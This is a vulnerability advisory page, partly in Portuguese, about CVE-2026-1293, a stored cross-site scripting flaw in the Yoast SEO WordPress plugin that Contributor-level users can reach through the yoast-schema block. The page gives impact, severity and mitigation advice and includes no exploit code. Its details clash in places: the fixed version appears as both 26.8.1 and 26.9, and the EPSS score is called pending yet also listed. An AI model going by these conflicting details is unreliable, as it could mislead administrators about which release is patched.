Plataforma
wordpress
Componente
wordpress-seo
Corrigido em
26.8.1
CVE-2026-1293 describes a Stored Cross-Site Scripting (XSS) vulnerability discovered in the Yoast SEO plugin for WordPress. This vulnerability allows authenticated attackers, possessing Contributor-level access or higher, to inject malicious web scripts into pages. Successful exploitation can lead to the execution of arbitrary JavaScript code in the browsers of users who subsequently access those pages, potentially compromising their sessions or stealing sensitive information. The vulnerability affects versions 0.0.0 through 26.8, and a patch is available in version 26.9.
An attacker exploiting this XSS vulnerability could execute arbitrary JavaScript code within the context of a user's browser session. This could lead to various malicious outcomes, including session hijacking, redirection to phishing sites, defacement of the website, or the theft of sensitive data like user credentials or personal information. The impact is amplified if the website is used for e-commerce or handles sensitive user data, as attackers could potentially gain access to financial information or other confidential details. The stored nature of the XSS means the injected script persists until removed, potentially affecting numerous users over time. This vulnerability shares similarities with other XSS attacks where malicious scripts are injected into trusted websites to compromise user accounts and data.
CVE-2026-1293 was published on February 6, 2026. Its severity is currently assessed as Medium. There are no known public exploits or active campaigns targeting this vulnerability at the time of writing. The vulnerability is not listed on CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is pending evaluation, but given the lack of public exploits, the probability of exploitation is currently considered low.
Status do Exploit
EPSS
0.04% (percentil 12%)
CISA SSVC
Vetor CVSS
The primary mitigation for CVE-2026-1293 is to immediately upgrade the Yoast SEO plugin to version 26.9 or later. If upgrading is not immediately feasible due to compatibility issues or testing requirements, consider implementing a temporary workaround by sanitizing user input within the yoast-schema block attribute. While not a complete solution, this can reduce the attack surface. Web Application Firewalls (WAFs) configured to detect and block XSS payloads can also provide an additional layer of defense. Monitor WordPress logs for suspicious activity, particularly requests involving the yoast-schema block, and implement strict access controls to limit user privileges to the minimum necessary.
Update to version 26.9, or a newer patched version
Análise de vulnerabilidades e alertas críticos diretamente no seu e-mail.
CVE-2026-1293 is a Stored Cross-Site Scripting (XSS) vulnerability in the Yoast SEO WordPress plugin, allowing authenticated attackers to inject malicious scripts via the yoast-schema block attribute, affecting versions 0.0.0–26.8.
You are affected if you are using Yoast SEO versions 0.0.0 through 26.8 and have users with Contributor access or higher.
Upgrade the Yoast SEO plugin to version 26.9 or later. As a temporary workaround, sanitize user input within the yoast-schema block attribute.
Currently, there are no known public exploits or active campaigns targeting CVE-2026-1293.
Refer to the official Yoast SEO website and WordPress security announcements for the latest advisory regarding CVE-2026-1293.
Envie seu arquivo de dependências e descubra na hora se esta e outras CVEs te atingem.
Envie seu arquivo de dependências e descubra na hora se esta e outras CVEs te atingem.